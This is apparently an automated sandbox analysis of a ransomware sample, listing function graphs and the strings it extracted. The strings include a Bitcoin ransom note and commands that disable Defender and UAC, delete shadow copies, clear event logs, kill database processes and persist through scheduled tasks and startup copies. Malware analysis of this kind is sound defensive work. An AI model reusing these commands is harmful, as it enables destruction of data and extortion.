                                      control_flow_graph 141 8dc940-8dc99e call 941f40 GetConsoleWindow ShowWindow 144 8dca39-8dcae7 call 8e98b0 * 4 141->144 145 8dc9a4-8dc9dd call 8e1fd0 141->145 168 8dcaf2-8dcaf9 144->168 150 8dc9e0-8dca07 call 8e2110 * 2 145->150 161 8dca09-8dca34 call 8e2410 call 8d7070 call 8e2290 150->161 161->168 171 8dcaff-8dcb13 168->171 172 8dcbf2-8dcc1e call 8b87e0 call 8e1b90 168->172 175 8dcb15-8dcb18 171->175 176 8dcb52-8dcb55 171->176 190 8dcc24-8dccdb call 8e1b90 * 2 call 8e1b30 call 8e9850 call 8e9d90 call 8e2290 * 2 call 8e1e30 call 8b87e0 call 8e2290 * 2 172->190 191 8dcce0-8dd022 call 8c3030 GetModuleFileNameW call 8e1a30 call 8c3eb0 call 8c3d50 call 8e19a0 call 8b49c0 call 8ea350 call 8ea420 call 8ea2e0 call 8b49c0 * 2 call 8e1860 * 2 CopyFileW call 8ea350 call 8ea420 call 8ea2e0 call 8b49c0 * 2 call 8e1860 * 2 CopyFileW call 8e1870 call 8e1890 call 8eace0 call 8e9750 call 8e9d90 call 8e2290 call 8e9750 call 8e9d90 call 8e2290 call 8e1e30 call 8b87e0 call 8e2290 call 8e1e30 call 8b87e0 call 8e2290 call 8e1870 call 8e1890 call 8eace0 call 8e9750 call 8e9d90 call 8e2290 call 8e1e30 call 8b87e0 call 8e2290 call 8d45a0 call 8b87e0 call 8e1b90 call 8e1aa0 call 8c38c0 172->191 177 8dcb20-8dcb2a 175->177 178 8dcb57-8dcb5a 176->178 179 8dcb92-8dcb95 176->179 177->177 182 8dcb2c-8dcb4d 177->182 183 8dcb60-8dcb6a 178->183 184 8dcbcd-8dcbe0 SetErrorMode SetConsoleTitleW call 8c60a0 179->184 185 8dcb97-8dcb9a 179->185 182->176 183->183 187 8dcb6c-8dcb8d 183->187 193 8dcbe5-8dcbec 184->193 188 8dcba0-8dcbaa 185->188 187->179 188->188 192 8dcbac-8dcbc9 188->192 190->191 316 8dd024-8dd02b 191->316 317 8dd086-8dd09b call 8c6550 * 2 191->317 192->184 193->172 196 8ded55-8ded72 call 940dbb 193->196 316->317 319 8dd02d-8dd034 316->319 327 8dd09d-8dd0bc call 8c6550 * 2 317->327 328 8dd0c2-8dd1d2 call 8e1870 call 8e1890 call 8eace0 call 8e2260 call 8b8ae0 call 8e19a0 call 8b49c0 call 8e1870 call 8e1890 call 8eace0 call 8b8ae0 call 8ea5a0 call 8e19a0 call 8b49c0 * 2 call 8c4cc0 call 8e1a80 317->328 319->317 321 8dd036-8dd042 call 8eb7b0 319->321 321->317 326 8dd044-8dd083 call 8e1aa0 * 2 call 8b9300 321->326 326->317 327->328 373 8dd1d4-8dd1d6 328->373 374 8dd1dc-8dd279 call 8ea350 call 8ea420 call 8ea2e0 call 8e19a0 call 8b49c0 * 3 call 8e1aa0 call 8b4a20 373->374 375 8dd2a8-8dd2e5 call 8e1aa0 call 8b4a20 call 8b49c0 373->375 429 8dd27e-8dd29a call 8b49c0 374->429 388 8dd2e7-8dd35d call 8ea350 call 8ea420 call 8ea2e0 call 8e19a0 call 8b49c0 * 3 375->388 389 8dd362-8dd385 call 8ea350 375->389 388->389 397 8dd38c-8dd3c0 call 8e1aa0 call 8b4a20 389->397 398 8dd387 call 8d1770 389->398 415 8dd402 397->415 416 8dd3c2-8dd3f2 call 8e1aa0 call 8b4a20 397->416 398->397 418 8dd409-8dd411 415->418 435 8dd3f7-8dd400 416->435 422 8dd42d-8dd44f call 8b49c0 418->422 423 8dd413-8dd427 call 8b49c0 418->423 437 8dd7fb-8dd9c1 call 959190 call 8e3fc0 call 8e9940 call 8b3730 call 8e3f40 call 959190 call 8c6650 call 8f6480 call 959190 call 8ded80 call 959190 call 8def20 call 8e0a00 call 8f2d90 call 8e0a00 call 8f2bc0 422->437 438 8dd455-8dd492 call 8e1aa0 call 8b4a20 call 8b49c0 422->438 423->422 429->375 443 8dd29c-8dd2a3 429->443 435->415 435->418 513 8dd9c7-8dd9d0 437->513 455 8dd494-8dd4a1 call 8e1970 438->455 456 8dd4a6-8dd4ac 438->456 443->373 455->456 457 8dd4b0-8dd4cb call 8e1aa0 call 8baf30 456->457 469 8dd4dd-8dd7f6 call 959190 call 8e4310 call 8e1490 call 8eb640 call 8e42a0 call 8e23a0 * 2 call 8e1bd0 * 2 call 8e1b30 call 8e22e0 call 8e2290 call 8e1b30 call 8e22e0 call 8e2290 call 8e1b90 * 2 call 8e1b30 call 8e1e90 call 8e1eb0 call 8eadc0 call 8e1940 call 8e1970 call 8e1b90 * 2 call 8e1b30 call 8e1e90 call 8e1eb0 call 8eadc0 call 8e1970 call 8b7fe0 call 8e22e0 call 8e2290 call 8e2230 call 8e2260 call 8e2290 call 8b49c0 call 8e2290 call 8b49c0 call 8e2290 * 4 call 8bace0 457->469 470 8dd4cd 457->470 649 8ddffe-8de061 call 959190 call 8b76c0 call 8f23a0 call 8e1a30 call 8e1660 469->649 472 8dd4cf-8dd4d2 470->472 473 8dd4d4-8dd4db Sleep 470->473 472->469 472->473 473->457 513->513 515 8dd9d2-8dda3e call 8b7e30 call 8e22e0 call 8e2290 call 8e1b30 * 2 513->515 537 8dda40-8dda49 515->537 537->537 539 8dda4b-8dda61 call 8e2260 537->539 545 8dda67-8dda70 539->545 545->545 547 8dda72-8dda91 call 8c46c0 545->547 554 8dda96-8dda9f 547->554 554->554 556 8ddaa1-8ddada call 8e9de0 call 8e22e0 call 8e2290 554->556 569 8ddae0-8ddae9 556->569 569->569 571 8ddaeb-8ddefc call 8e2410 call 8b7e30 call 8e22e0 call 8e2290 call 959190 call 8e3fc0 call 8e9750 call 8e9d90 call 8e9c80 call 8b3730 call 8e2290 * 2 call 8e3f40 call 8e1870 call 8e1890 call 8eace0 call 959190 call 8e3fc0 call 8e9ca0 call 8e9c80 call 8e2290 call 8e9ca0 call 8e9c80 call 8e2290 call 8e3f40 call 8e2410 call 8c4e20 call 8ea350 call 8ea420 call 8ea2e0 call 8b49c0 * 2 call 959190 call 8e4310 call 8b3730 call 8e42a0 call 8e1aa0 call 8d2460 569->571 731 8ddf01-8ddff5 call 8bace0 call 8b49c0 call 8e2290 * 2 call 8bb0a0 call 8e2290 call 8bb0a0 call 8e2290 * 5 call 8b7d70 call 8c6810 * 2 571->731 672 8de073-8de379 call 8ea5f0 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8e19a0 call 8b49c0 * 10 call 8e23a0 call 8e1e30 call 965a92 call 8e23a0 call 8e1e30 call 965a92 call 8ea5f0 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8e19a0 call 8b49c0 * 8 call 8e98b0 649->672 673 8de063-8de06e call 8e1940 649->673 825 8de37f-8de390 call 8bf630 672->825 826 8de4e7-8de4f8 call 8e98b0 672->826 673->672 731->649 793 8ddff9 call 8bb0a0 731->793 793->649 833 8dec74-8ded50 call 8b87e0 call 8e2290 * 3 call 8b49c0 call 8b78d0 call 8b49c0 * 2 call 8e2290 * 8 call 8b49c0 * 3 call 8e2290 825->833 834 8de396-8de487 call 8ea350 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8b49c0 * 5 call 8e1860 * 2 call 9661d6 825->834 831 8de4fe-8de873 call 8b5130 * 2 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 826->831 832 8dec20-8dec31 call 8e98b0 826->832 1023 8de879-8debff call 8b5130 * 2 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 call 8b5240 * 2 831->1023 1024 8dec04-8dec1e call 8b5240 * 2 831->1024 844 8dec61-8dec6d call 8cfd50 832->844 845 8dec33-8dec48 call 8ce2e0 * 2 832->845 833->196 938 8de489-8de4d0 call 8ea480 call 8e19a0 call 8b49c0 call 8e1860 * 2 call 9661d6 834->938 939 8de4d3-8de4e2 call 8b49c0 834->939 844->833 861 8dec6f 844->861 845->833 871 8dec4a-8dec5f call 8ce2e0 * 2 845->871 861->833 866 8dec6f call 8cfd50 861->866 866->833 871->833 938->939 939->833 1023->1024 1024->833
                                      APIs
                                      • GetConsoleWindow.KERNEL32 ref: 008DC989
                                      • ShowWindow.USER32(00000000,00000000), ref: 008DC992
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Window$ConsoleShow
                                      • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$" start= auto$" start=auto$.1UI$77H75$:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Fast$Fast$Lpath$Manual_Mini_Config$Mini_Config$Normal_Config$Second Email :$Version 5.$\AppData\N-Save.sys$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\Start Menu\Programs\Startup\Xinfecter.exe$c$dcdcf$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$spath$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$u4g8$ver$Z0
                                      • API String ID: 3999960783-3856679227
                                      • Opcode ID: 8083070f9229ee887b20fe998cd845dd3e1925351bb31d714d307ef6789d4cc7
                                      • Instruction ID: 47cd3d6a2820e8769c62181dcc9b6234e832cc0b318a02f6dab5582969495034
                                      • Opcode Fuzzy Hash: 8083070f9229ee887b20fe998cd845dd3e1925351bb31d714d307ef6789d4cc7
                                      • Instruction Fuzzy Hash: 2AD2AF70D00298AADB24F768CD56BDD77A4FB52344F4081E9A449A72D2EF706F48CB93
                                      Function 008B9300 Relevance: 59.2, APIs: 1, Strings: 32, Instructions: 1466COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2080 8b9300-8b93a0 call 8e7430 * 2 2085 8b93a2-8b93ac call 8e7430 2080->2085 2086 8b93b1-8b9400 call 8e1aa0 * 2 call 8ebfa0 2080->2086 2085->2086 2094 8b954b-8b961c call 8ea350 call 8e88e0 * 2 2086->2094 2095 8b9406-8b943b call 958c10 2086->2095 2114 8b961e-8b9633 2094->2114 2115 8b9653-8b967d 2094->2115 2101 8baca8 call 8e8890 2095->2101 2102 8b9441-8b94a2 call 958c10 call 8ea350 2095->2102 2107 8bacad call 965942 2101->2107 2116 8b950e-8b9514 2102->2116 2117 8b94a4-8b94ad 2102->2117 2113 8bacb2 call 965942 2107->2113 2127 8bacb7 call 8e8890 2113->2127 2119 8b9649-8b9650 call 94143c 2114->2119 2120 8b9635-8b9643 2114->2120 2121 8b967f-8b9694 2115->2121 2122 8b96b4-8b96e0 2115->2122 2116->2094 2129 8b9516-8b952b 2116->2129 2125 8b94af-8b94c4 2117->2125 2126 8b94e4-8b950b 2117->2126 2119->2115 2120->2113 2120->2119 2130 8b96aa-8b96b1 call 94143c 2121->2130 2131 8b9696-8b96a4 2121->2131 2123 8b96e6-8b96ee 2122->2123 2124 8b9aa4-8b9aef call 8e7430 2122->2124 2134 8b96f0-8b96f7 2123->2134 2147 8b9b11-8b9b7e call 8ea5f0 call 8e88e0 2124->2147 2148 8b9af1-8b9b0c call 8e7430 * 2 2124->2148 2135 8b94da-8b94e1 call 94143c 2125->2135 2136 8b94c6-8b94d4 2125->2136 2126->2116 2145 8bacbc call 965942 2127->2145 2139 8b952d-8b953b 2129->2139 2140 8b9541-8b9548 call 94143c 2129->2140 2130->2122 2131->2113 2131->2130 2134->2124 2143 8b96fd-8b9703 2134->2143 2135->2126 2136->2107 2136->2135 2139->2107 2139->2140 2140->2094 2143->2134 2149 8b9705-8b9743 call 959190 call 8e4310 2143->2149 2156 8bacc1 call 965942 2145->2156 2170 8b9b80-8b9b95 2147->2170 2171 8b9bb5-8b9bc4 2147->2171 2148->2147 2168 8b9749-8b97b4 call 8f0a10 2149->2168 2169 8b99b3-8b99c0 2149->2169 2164 8bacc6 call 965942 2156->2164 2172 8baccb-8bacd0 call 965942 2164->2172 2193 8b986a-8b9894 call 8ec0e0 2168->2193 2194 8b97ba 2168->2194 2173 8b99c2-8b99c4 2169->2173 2174 8b99c6-8b99ea call 8e8140 call 9625ba 2169->2174 2178 8b9bab-8b9bb2 call 94143c 2170->2178 2179 8b9b97-8b9ba5 2170->2179 2175 8b9be8-8b9c41 call 8ea5f0 call 8e88e0 2171->2175 2176 8b9bc6-8b9bd0 2171->2176 2183 8b99ed-8b99fe call 8e8210 2173->2183 2174->2183 2216 8b9c43-8b9c58 2175->2216 2217 8b9c84-8b9c9d 2175->2217 2185 8b9bd2-8b9bd9 2176->2185 2178->2171 2179->2164 2179->2178 2206 8b9a2a-8b9aa0 call 8e4fc0 call 9294bf 2183->2206 2207 8b9a00-8b9a25 call 8b3740 2183->2207 2185->2175 2190 8b9bdb-8b9be1 2185->2190 2190->2185 2196 8b9be3 2190->2196 2213 8b997b-8b9982 2193->2213 2214 8b989a-8b98fb call 8ec0e0 * 2 2193->2214 2200 8b97c0-8b97c7 2194->2200 2204 8b9cd4-8baba7 call 8ea5f0 call 8e88e0 * 32 call 8e75d0 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8b49c0 * 37 call 959190 call 8e2680 call 8ea9f0 call 8e2640 call 8ea350 call 8ea420 call 8ea2e0 call 8b49c0 * 2 call 8e23a0 call 959190 call 8e4190 call 8e9c80 call 8e4120 call 8ea350 call 8ea420 call 8ea2e0 call 8b49c0 * 2 call 8e23a0 call 959190 call 8e4190 call 8e9c80 call 8e4120 call 965a92 2196->2204 2201 8b97fb-8b980e call 8e7160 2200->2201 2202 8b97c9-8b97cb 2200->2202 2233 8b9810-8b9816 2201->2233 2234 8b9847-8b984e 2201->2234 2209 8b97cd-8b97d4 2202->2209 2210 8b97f6-8b97f8 2202->2210 2468 8baba9-8babb0 2204->2468 2469 8babe1-8baca7 call 8bae70 call 8e2290 call 8b49c0 call 8bae70 call 8e2290 call 8b49c0 call 8bad70 call 8b49c0 * 10 call 940dbb 2204->2469 2206->2124 2207->2206 2219 8b97e3-8b97e7 2209->2219 2220 8b97d6-8b97dc 2209->2220 2210->2201 2213->2169 2224 8b9984-8b9993 2213->2224 2214->2127 2260 8b9901-8b9941 call 8e7430 call 96251c 2214->2260 2226 8b9c5a-8b9c68 2216->2226 2227 8b9c6e-8b9c7c call 94143c 2216->2227 2217->2204 2221 8b9c9f-8b9cb4 2217->2221 2242 8b97ec-8b97ef 2219->2242 2220->2219 2229 8b97de-8b97e1 2220->2229 2230 8b9cca-8b9cd1 call 94143c 2221->2230 2231 8b9cb6-8b9cc4 2221->2231 2235 8b99a9-8b99b0 call 94143c 2224->2235 2236 8b9995-8b99a3 2224->2236 2226->2172 2226->2227 2227->2217 2229->2242 2230->2204 2231->2172 2231->2230 2246 8b9818-8b981f 2233->2246 2247 8b9833-8b9837 2233->2247 2243 8b9852-8b9864 call 8f0a10 2234->2243 2235->2169 2236->2156 2236->2235 2242->2210 2252 8b97f1-8b97f4 2242->2252 2243->2193 2243->2200 2246->2247 2254 8b9821-8b9831 2246->2254 2257 8b983c-8b983f 2247->2257 2252->2201 2254->2257 2257->2234 2262 8b9841-8b9845 2257->2262 2271 8b9943-8b9955 2260->2271 2272 8b9975-8b9978 2260->2272 2262->2243 2274 8b996b-8b9972 call 94143c 2271->2274 2275 8b9957-8b9965 2271->2275 2272->2213 2274->2272 2275->2145 2275->2274 2468->2469 2470 8babb2-8babce call 8e23a0 call 8e1e30 call 965a92 2468->2470 2483 8babd3-8babdc call 8e2290 2470->2483 2483->2469
                                      APIs
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008B9A98
                                        • Part of subcall function 0096251C: DeleteFileW.KERNEL32(?,?,008B9938,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00962524
                                        • Part of subcall function 0096251C: GetLastError.KERNEL32(?,008B9938,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 0096252E
                                        • Part of subcall function 0096251C: __dosmaperr.LIBCMT ref: 00962535
                                      Strings
                                      • schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr, xrefs: 008BA831
                                      • \AppData\S-6748.bat, xrefs: 008B95BD
                                      • rem a5m6f, xrefs: 008B9BEB
                                      • ">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST , xrefs: 008B9D99
                                      • "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\, xrefs: 008B9AAF
                                      • :\Users\ReadMe.hta", xrefs: 008B9B2B
                                      • rem, xrefs: 008B9354
                                      • )IF NOT EXIST , xrefs: 008BA3D5
                                      • \AppData\S-8459.vbs, xrefs: 008BAA51
                                      • Xinfecter.exe" (IF EXIST ", xrefs: 008BA485
                                      • "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\, xrefs: 008B9B04
                                      • ">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST , xrefs: 008BA109
                                      • @echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"), xrefs: 008BAB3A
                                      • @echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D, xrefs: 008B9CD7
                                      • l, xrefs: 008BAB79
                                      • (goto secthree):akakak, xrefs: 008BA803
                                      • slow, xrefs: 008B93A4
                                      • Xinfecter.exe" (start /d , xrefs: 008B9E53, 008BA275
                                      • schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f, xrefs: 008BABB2
                                      • Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel, xrefs: 008BAA84
                                      • a5m6f, xrefs: 008B9882, 008B98A5
                                      • ):secttwotasklist /fi "ImageName eq , xrefs: 008B9FA9
                                      • kaj3n, xrefs: 008B98C5, 008B9C01
                                      • :\Users\, xrefs: 008B954B, 008BAA27, 008BAADD
                                      • (start /d , xrefs: 008BA589
                                      • (goto secttwo:sectonIF EXIST , xrefs: 008BA1C5
                                      • " /fo csv 2>NUL | find /I ", xrefs: 008B9CED, 008BA059
                                      • " Xinfecter.exe , xrefs: 008B9EF9, 008BA329
                                      • Xinfecter.exe, xrefs: 008B96E6, 008B9BC6
                                      • cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, xrefs: 008BAB93
                                      • \AppData\S-2153.bat, xrefs: 008BAB07
                                      • ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST , xrefs: 008BA7D1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: DeleteErrorFileIos_base_dtorLast__dosmaperrstd::ios_base::_
                                      • String ID: ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST $):secttwotasklist /fi "ImageName eq $)IF NOT EXIST $schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr$ (goto secthree):akakak$ (goto secttwo:sectonIF EXIST $ (start /d $" /fo csv 2>NUL | find /I "$" Xinfecter.exe $"%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\$"%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST $">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST $:\Users\$:\Users\ReadMe.hta"$@echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs")$@echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D$Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel$Xinfecter.exe$Xinfecter.exe" (IF EXIST "$Xinfecter.exe" (start /d $\AppData\S-2153.bat$\AppData\S-6748.bat$\AppData\S-8459.vbs$a5m6f$cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat$kaj3n$l$rem$rem a5m6f$schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f$slow
                                      • API String ID: 969238624-3584783570
                                      • Opcode ID: 75078c94f373e0e53e2798fa14d0e0085ad7a62e45f9fee4e550c2c7f7b6bf0f
                                      • Instruction ID: 0fa943991d5d6e96a9bed7fedf3e345315e0517949616d5b67c71eee263b2a78
                                      • Opcode Fuzzy Hash: 75078c94f373e0e53e2798fa14d0e0085ad7a62e45f9fee4e550c2c7f7b6bf0f
                                      • Instruction Fuzzy Hash: 7CF24770D04658CADB14DF68CD55BEEBBB0FF55308F0042D9E509A72A2EB74AA88CF51
                                      Function 008DD85F Relevance: 56.8, APIs: 1, Strings: 31, Instructions: 777COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2514 8dd85f-8dd8c0 call 8e1970 call 959190 call 8e3fc0 call 8e9940 call 8e3f40 2525 8dd8c9-8dd9c1 call 959190 call 8c6650 call 8f6480 call 959190 call 8ded80 call 959190 call 8def20 call 8e0a00 call 8f2d90 call 8e0a00 call 8f2bc0 2514->2525 2526 8dd8c4 call 8bb0a0 2514->2526 2549 8dd9c7-8dd9d0 2525->2549 2526->2525 2549->2549 2550 8dd9d2-8dda3e call 8b7e30 call 8e22e0 call 8e2290 call 8e1b30 * 2 2549->2550 2561 8dda40-8dda49 2550->2561 2561->2561 2562 8dda4b-8dda61 call 8e2260 2561->2562 2565 8dda67-8dda70 2562->2565 2565->2565 2566 8dda72-8dda91 call 8c46c0 2565->2566 2569 8dda96-8dda9f 2566->2569 2569->2569 2570 8ddaa1-8ddada call 8e9de0 call 8e22e0 call 8e2290 2569->2570 2577 8ddae0-8ddae9 2570->2577 2577->2577 2578 8ddaeb-8ddb4f call 8e2410 call 8b7e30 call 8e22e0 call 8e2290 call 959190 2577->2578 2588 8ddb54-8ddb66 call 8e3fc0 2578->2588 2590 8ddb6b-8ddcf5 call 8e9750 call 8e9d90 call 8e9c80 call 8b3730 call 8e2290 * 2 call 8e3f40 call 8e1870 call 8e1890 call 8eace0 call 959190 2588->2590 2613 8ddcfa-8ddd0c call 8e3fc0 2590->2613 2615 8ddd11-8ddd9d call 8e9ca0 call 8e9c80 call 8e2290 call 8e9ca0 call 8e9c80 call 8e2290 call 8e3f40 call 8e2410 2613->2615 2631 8ddda2-8dddb5 call 8c4e20 2615->2631 2633 8dddba-8dde33 call 8ea350 call 8ea420 call 8ea2e0 call 8b49c0 * 2 call 959190 2631->2633 2645 8dde38-8dde4a call 8e4310 2633->2645 2647 8dde4f-8ddeda call 8b3730 call 8e42a0 2645->2647 2653 8ddeeb-8ddefc call 8e1aa0 call 8d2460 2647->2653 2657 8ddf01-8ddff5 call 8bace0 call 8b49c0 call 8e2290 * 2 call 8bb0a0 call 8e2290 call 8bb0a0 call 8e2290 * 5 call 8b7d70 call 8c6810 * 2 2653->2657 2688 8ddffe-8de061 call 959190 call 8b76c0 call 8f23a0 call 8e1a30 call 8e1660 2657->2688 2689 8ddff9 call 8bb0a0 2657->2689 2700 8de073-8de379 call 8ea5f0 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8e19a0 call 8b49c0 * 10 call 8e23a0 call 8e1e30 call 965a92 call 8e23a0 call 8e1e30 call 965a92 call 8ea5f0 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8e19a0 call 8b49c0 * 8 call 8e98b0 2688->2700 2701 8de063-8de06e call 8e1940 2688->2701 2689->2688 2793 8de37f-8de390 call 8bf630 2700->2793 2794 8de4e7-8de4f8 call 8e98b0 2700->2794 2701->2700 2801 8dec74-8ded72 call 8b87e0 call 8e2290 * 3 call 8b49c0 call 8b78d0 call 8b49c0 * 2 call 8e2290 * 8 call 8b49c0 * 3 call 8e2290 call 940dbb 2793->2801 2802 8de396-8de487 call 8ea350 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8b49c0 * 5 call 8e1860 * 2 call 9661d6 2793->2802 2799 8de4fe-8de873 call 8b5130 * 2 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 call 8e1600 call 8e1aa0 